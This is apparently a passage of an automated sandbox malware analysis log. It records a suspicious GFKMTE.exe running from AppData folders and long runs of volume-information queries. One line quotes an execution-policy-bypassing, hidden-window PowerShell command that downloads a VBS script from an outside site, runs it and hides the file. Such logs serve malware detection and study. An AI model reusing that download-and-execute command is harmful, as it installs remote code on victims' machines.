                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -windowstyle -command hidden consent.exe;(new-object system.net.webclient).downloadfile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').attributes += 'hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe VolumeInformation
